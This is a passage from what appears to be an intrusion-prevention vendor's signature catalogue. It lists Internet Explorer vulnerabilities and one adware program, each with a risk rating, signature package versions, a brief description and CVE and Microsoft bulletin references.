https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8618
ms17-jul
http://technet.microsoft.com/security/bulletin/ms17-jul
Back to top

Internet-Explorer-Remote-Code-Execution-Vulnerability-CVE-2018-8619

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1476-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There exists a policy bypass vulnerability in Internet Explorer. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-TextId_Internet-Explorer-Remote-Code-Execution-Vulnerability-CVE-2018-8619
References:
CVE-2018-8619
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8619
ms18-dec
http://technet.microsoft.com/security/bulletin/ms18-dec
Back to top

Internet-Explorer-Remote-Code-Execution-Vulnerability-CVE-2018-8653

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1122-5242
Last changed: sgpkg-ips-1476-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There exists a use-after-free vulnerability in Internet Explorer. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Internet-Explorer-Remote-Code-Execution-Vulnerability-CVE-2018-8653
References:
CVE-2018-8653
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8653
ms18-dec
http://technet.microsoft.com/security/bulletin/ms18-dec
Back to top

Internet-Explorer-Same-Origin-Policy-Bypass

About this vulnerability: Cross-site scripting vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-156-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 5.0; Internet Explorer 5.5; Internet Explorer 6.0
Type: Cross-site Scripting
Description: There is a cross site scripting vulnerability in Internet Explorer. The vulnerability allows bypassing of the same origin policy enforced by the browser, leading to unauthorized access to sensitive information of another web site such as authentication cookies.
Situation: HTTP_SS-Same-Origin-Policy-Bypass
File-Text_Same-Origin-Policy-Bypass
References:
CVE-2002-1186
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1186
BID-5610
http://www.securityfocus.com/bid/5610
OSVDB-7845
http://www.osvdb.org/7845
MS02-066
http://technet.microsoft.com/security/bulletin/MS02-066
Back to top

Internet-Explorer-Scripting-Engine-Memory-Corruption-CVE-2020-17053

About this vulnerability: A vulnerability in Internet Explorer Scripting Engine
Risk: High
First detected in: sgpkg-ips-1295-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0
Type: Malfunction
Description: There exists a memory corruption vulnerability in Internet Explorer Scripting Engine. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet-Explorer-Scripting-Engine-Memory-Corruption-CVE-2020-17053
References:
CVE-2020-17053
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17053
ms20-nov
http://technet.microsoft.com/security/bulletin/ms20-nov
Back to top

Internet-Explorer-Scroll-Event-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-417-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Microsoft Internet Explorer
Situation: HTTP_SS-Internet-Explorer-Scroll-Event-Remote-Code-Execution
File-Text_Internet-Explorer-Scroll-Event-Remote-Code-Execution
References:
CVE-2011-1993
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1993
MS11-081
http://technet.microsoft.com/security/bulletin/MS11-081
Back to top

Internet-Explorer-Security-Zone-Bypass-Url-Spoofing

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Input Validation
Description: There is a vulnerability in the way Internet Explorer handles security restrictions within a web page. It allows a remote attacker to bypass the domain restriction and execute arbitrary code on the victim computer.
Situation: File-Text_Internet-Explorer-Security-Zone-Bypass-Url-Spoofing
References:
BID-10597
http://www.securityfocus.com/bid/10597
Back to top

Internet-Explorer-toStaticHTML-Cross-Site-Scripting

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-402-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A cross site scripting vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to the toStaticHTML method failing to properly remove dynamic HTML elements from specially crafted HTML fragments.
Situation: HTTP_SS-Internet-Explorer-toStaticHTML-Cross-Site-Scripting
File-Text_Internet-Explorer-toStaticHTML-Cross-Site-Scripting
References:
CVE-2011-1252
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1252
OSVDB-72944
http://www.osvdb.org/72944
MS09-050
http://technet.microsoft.com/security/bulletin/MS09-050
Back to top

Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-2557

About this vulnerability: A memory corruption vulnerability in Microsoft Internet Explorer
Risk: Critical
First detected in: sgpkg-ips-330-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Internet Explorer. By enticing a target user to visit a malicious web page, an attacker can execute arbitrary code with the privileges of the logged in user.
Situation: HTTP_SS-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-2557
File-Text_Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-2557
References:
CVE-2010-2557
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2557
MS10-053
http://technet.microsoft.com/security/bulletin/MS10-053
Back to top

Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-2559

About this vulnerability: A memory corruption vulnerability in Microsoft Internet Explorer
Risk: Critical
First detected in: sgpkg-ips-330-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Internet Explorer. By enticing a target user to visit a malicious web page, an attacker can execute arbitrary code with the privileges of the logged in user.
Situation: HTTP_SS-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-2559
File-Text_Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-2559
References:
CVE-2010-2559
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2559
BID-42290
http://www.securityfocus.com/bid/42290
MS10-053
http://technet.microsoft.com/security/bulletin/MS10-053
Back to top

Internet-Explorer-Uninitialized-Parameter-DoS

About this vulnerability: Internet Explorer Uninitialized Parameter DoS vulnerability.
Risk: High
First detected in: sgpkg-ips-670-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Internet Explorer
Type: Browser
Description: A vulnerability exists in Internet Explorer that allows remote attackers to trigger a denial of service by accessing a parameter of an unitialized HtmlDlgSafeHelper.HtmlDlgSafeHelper.BlockFormats or Internet.PopupMenu.RemoveItem ActiveX object.
Situation: File-Text_Internet-Explorer-Uninitialized-Parameter-DoS
Back to top

Internet-Explorer-Use-After-Free-CVE-2012-4787

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-497-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: An attempt to exploit vulnerability in Internet Explorer was detected
Situation: File-Text_Internet-Explorer-Use-After-Free-CVE-2012-4787
References:
CVE-2012-4787
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4787
MS12-077
http://technet.microsoft.com/security/bulletin/MS12-077
Back to top

Internet-Explorer-Use-After-Free-CVE-2012-4792

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-500-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: An attempt to exploit vulnerability in Internet Explorer was detected.
Situation: File-Text_Internet-Explorer-Use-After-Free-CVE-2012-4792
References:
CVE-2012-4792
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4792
OSVDB-88774
http://www.osvdb.org/88774
MS13-008
http://technet.microsoft.com/security/bulletin/MS13-008
Back to top

Internet-Explorer-Use-After-Free-CVE-2013-0025

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-509-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Internet Explorer
Situation: File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0025-And-CVE-2013-1288
References:
CVE-2013-0025
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0025
BID-57830
http://www.securityfocus.com/bid/57830
OSVDB-90122
http://www.osvdb.org/90122
MS13-009
http://technet.microsoft.com/security/bulletin/MS13-009
Back to top

Internet-Explorer-Use-After-Free-CVE-2013-0026

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-509-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Internet Explorer
Situation: File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0026
References:
CVE-2013-0026
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0026
OSVDB-90123
http://www.osvdb.org/90123
MS13-009
http://technet.microsoft.com/security/bulletin/MS13-009
Back to top

Internet-Explorer-Use-After-Free-CVE-2013-0029

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-509-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Internet Explorer
Situation: File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0029
References:
CVE-2013-0029
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0029
MS13-009
http://technet.microsoft.com/security/bulletin/MS13-009
Back to top

Internet-Explorer-Use-After-Free-CVE-2013-0087

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-515-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Internet Explorer
Situation: File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0087
References:
CVE-2013-0087
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0087
MS13-021
http://technet.microsoft.com/security/bulletin/MS13-021
Back to top

Internet-Explorer-Use-After-Free-CVE-2013-0088

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-515-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Internet Explorer
Situation: File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0088
References:
CVE-2013-0088
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0088
MS13-021
http://technet.microsoft.com/security/bulletin/MS13-021
Back to top

Internet-Explorer-Use-After-Free-CVE-2013-0090

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-515-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Internet Explorer
Situation: File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0090
References:
CVE-2013-0090
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0090
MS13-021
http://technet.microsoft.com/security/bulletin/MS13-021
Back to top

Internet-Explorer-Use-After-Free-CVE-2013-0091

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-527-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Internet Explorer
Situation: File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0091
References:
CVE-2013-0091
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0091
MS13-021
http://technet.microsoft.com/security/bulletin/MS13-021
Back to top

Internet-Explorer-Use-After-Free-CVE-2013-0092

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-515-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Internet Explorer
Situation: File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0092
References:
CVE-2013-0092
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0092
MS13-021
http://technet.microsoft.com/security/bulletin/MS13-021
Back to top

Internet-Explorer-Use-After-Free-CVE-2013-0093

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-515-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Internet Explorer
Situation: File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0093
References:
CVE-2013-0093
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0093
MS13-021
http://technet.microsoft.com/security/bulletin/MS13-021
Back to top

Internet-Explorer-Use-After-Free-CVE-2013-0094

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-515-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Internet Explorer
Situation: File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0094
References:
CVE-2013-0094
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0094
MS13-021
http://technet.microsoft.com/security/bulletin/MS13-021
Back to top

Internet-Explorer-Use-After-Free-CVE-2013-1288

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-515-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 8.0
Type: Malfunction
Description: There is a use after free vulnerability in Internet Explorer 8.0.
Situation: File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0025-And-CVE-2013-1288
References:
CVE-2013-1288
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1288
MS13-021
http://technet.microsoft.com/security/bulletin/MS13-021
Back to top

Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-2551

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-523-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Internet Explorer
Situation: File-Text_Internet-Explorer-Use-After-Free-CVE-2013-2551
References:
CVE-2013-2551
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2551
BID-58570
http://www.securityfocus.com/bid/58570
OSVDB-91197
http://www.osvdb.org/91197
MS13-037
http://technet.microsoft.com/security/bulletin/MS13-037
Back to top

Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3110

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-526-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Internet Explorer
Situation: File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3110
References:
CVE-2013-3110
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3110
MS13-047
http://technet.microsoft.com/security/bulletin/MS13-047
Back to top

Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3111

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-526-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Internet Explorer
Situation: File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3111
References:
CVE-2013-3111
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3111
BID-60381
http://www.securityfocus.com/bid/60381
OSVDB-94106
http://www.osvdb.org/94106
MS13-047
http://technet.microsoft.com/security/bulletin/MS13-047
Back to top

Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3112

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-526-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Internet Explorer
Situation: File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3112
File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3112-2
References:
CVE-2013-3112
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3112
MS13-047
http://technet.microsoft.com/security/bulletin/MS13-047
Back to top

Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3116

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-526-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Internet Explorer
Situation: File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3116
References:
CVE-2013-3116
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3116
MS13-047
http://technet.microsoft.com/security/bulletin/MS13-047
Back to top

Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3117

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-526-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Internet Explorer
Situation: File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3117
References:
CVE-2013-3117
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3117
MS13-047
http://technet.microsoft.com/security/bulletin/MS13-047
Back to top

Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3118

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-526-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Internet Explorer
Situation: File-TextId_Internet-Explorer-Use-After-Free-CVE-2013-3118
References:
CVE-2013-3118
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3118
OSVDB-94112
http://www.osvdb.org/94112
MS13-047
http://technet.microsoft.com/security/bulletin/MS13-047
Back to top

Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3119

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-527-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Internet Explorer
Situation: File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3119
References:
CVE-2013-3119
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3119
BID-60388
http://www.securityfocus.com/bid/60388
OSVDB-94113
http://www.osvdb.org/94113
MS13-047
http://technet.microsoft.com/security/bulletin/MS13-047
Back to top

Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3120

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-526-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Internet Explorer
Situation: File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3120
References:
CVE-2013-3120
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3120
MS13-047
http://technet.microsoft.com/security/bulletin/MS13-047
Back to top

Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3121

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-526-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Internet Explorer
Situation: File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3121
References:
CVE-2013-3121
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3121
BID-60390
http://www.securityfocus.com/bid/60390
OSVDB-94115
http://www.osvdb.org/94115
MS13-047
http://technet.microsoft.com/security/bulletin/MS13-047
Back to top

Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3122

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-526-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Internet Explorer
Situation: File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3122
References:
CVE-2013-3122
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3122
MS13-047
http://technet.microsoft.com/security/bulletin/MS13-047
Back to top

Internet-Explorer-Use-After-Free-Vulnerability-CVE-2013-3142

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-527-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Internet Explorer
Situation: File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3142
References:
CVE-2013-3142
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3142
MS13-047
http://technet.microsoft.com/security/bulletin/MS13-047
Back to top

Internet-Explorer-VML-Memory-Corruption-CVE-2013-0030

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-509-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Internet Explorer
Situation: File-Text_Internet-Explorer-VML-Memory-Corruption-CVE-2013-0030
File-Text_Internet-Explorer-VML-Memory-Corruption-CVE-2013-0030-2
References:
CVE-2013-0030
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0030
OSVDB-90127
http://www.osvdb.org/90127
MS13-010
http://technet.microsoft.com/security/bulletin/MS13-010
Back to top

Internet-Explorer-Vulnerability-CVE-2016-0002

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-720-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Microsoft Explorer.
Situation: File-Text_Internet-Explorer-Vulnerability-CVE-2016-0002
References:
CVE-2016-0002
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0002
MS16-001
http://technet.microsoft.com/security/bulletin/MS16-001
Back to top

Internetoptimizer

About this vulnerability: InternetOptimizer
Risk: Low
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: InternetOptimizer
Type: Misconfiguration
Description: InternetOptimizer is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSU-Internetoptimizer
HTTP_CSH-Internetoptimizer
Back to top

Internet_Explorer_11_Buffer_Overrun_Vulnerability_CVE-2019-0666

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1143-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There exists a buffer overrun vulnerability in Internet Explorer 11. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_11_Buffer_Overrun_Vulnerability_CVE-2019-0666
References:
CVE-2019-0666
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0666
ms19-mar
http://technet.microsoft.com/security/bulletin/ms19-mar
Back to top

Internet_Explorer_11_Security_Bypass_Vulnerability_CVE-2019-0768

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1143-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There exists a security bypass vulnerability in Internet Explorer 11. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_11_Security_Bypass_Vulnerability_CVE-2019-0768
References:
CVE-2019-0768
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0768
ms19-mar
http://technet.microsoft.com/security/bulletin/ms19-mar
Back to top

Internet_Explorer_11_Use_After_Free_Vulnerability_CVE-2019-0665

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1143-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Use-after-free
Description: There exists a use after free vulnerability in Internet Explorer 11. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_11_Use_After_Free_Vulnerability_CVE-2019-0665
References:
CVE-2019-0665
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0665
ms19-mar
http://technet.microsoft.com/security/bulletin/ms19-mar
Back to top

Internet_Explorer_11_Use_After_Free_Vulnerability_CVE-2019-0667

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1143-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Use-after-free
Description: There exists a use after free vulnerability in Internet Explorer 11. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_11_Use_After_Free_Vulnerability_CVE-2019-0667
References:
CVE-2019-0667
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0667
ms19-mar
http://technet.microsoft.com/security/bulletin/ms19-mar
Back to top

Internet_Explorer_11_Use_After_Free_Vulnerability_CVE-2019-0680

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1143-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Use-after-free
Description: There exists a use after free vulnerability in Internet Explorer 11. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_11_Use_After_Free_Vulnerability_CVE-2019-0680
References:
CVE-2019-0680
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0680
ms19-mar
http://technet.microsoft.com/security/bulletin/ms19-mar
Back to top

Internet_Explorer_11_Use_After_Free_Vulnerability_CVE-2019-0763

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1143-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Use-after-free
Description: There exists a use after free vulnerability in Internet Explorer 11. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_11_Use_After_Free_Vulnerability_CVE-2019-0763
References:
CVE-2019-0763
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0763
ms19-mar
http://technet.microsoft.com/security/bulletin/ms19-mar
Back to top

Internet_Explorer_Arbitrary_Pointer_Dereference_Vulnerability_CVE-2019-0884

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1159-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There exists an arbitrary pointer dereference vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_Arbitrary_Pointer_Dereference_Vulnerability_CVE-2019-0884
References:
CVE-2019-0884
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0884
ms19-may
http://technet.microsoft.com/security/bulletin/ms19-may
Back to top

Internet_Explorer_Integer_Overflow_Vulnerability_CVE-2019-0794

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1149-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Integer Overflow
Description: There exists an integer overflow vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_Integer_Overflow_Vulnerability_CVE-2019-0794
References:
CVE-2019-0794
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0794
ms19-apr
http://technet.microsoft.com/security/bulletin/ms19-apr
Back to top

Internet_Explorer_Memory_Corruption_Vulnerability_CVE-2019-0752

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1149-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There exists a memory corruption vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_Memory_Corruption_Vulnerability_CVE-2019-0752
References:
CVE-2019-0752
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0752
ms19-apr
http://technet.microsoft.com/security/bulletin/ms19-apr
Back to top

Internet_Explorer_Memory_Corruption_Vulnerability_CVE-2019-0753

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1149-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There exists a memory corruption vulnerability in Internet Explorer. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Internet_Explorer_Memory_Corruption_Vulnerability_CVE-2019-0753
References:
CVE-2019-0753
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0753
ms19-apr
http://technet.microsoft.com/security/bulletin/ms19-apr
Back to top

Internet_Explorer_Memory_Corruption_Vulnerability_CVE-2021-26411

About this vulnerability: An attempt to exploit a vulnerability in Internet Explorer detected
Risk: High
First detected in: sgpkg-ips-1327-5242
Last changed: sgpkg-ips-1697-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: An attempt to exploit a memory corruption vulnerability in Internet Explorer. Successful exploitation could lead in arbitrary code execution.
Situation: File-Binary_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2021-26411
File-Text_Internet_Explorer_Memory_Corruption_Vulnerability_CVE-2021-26411
References:
CVE-2021-26411
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26411
ms21-mar
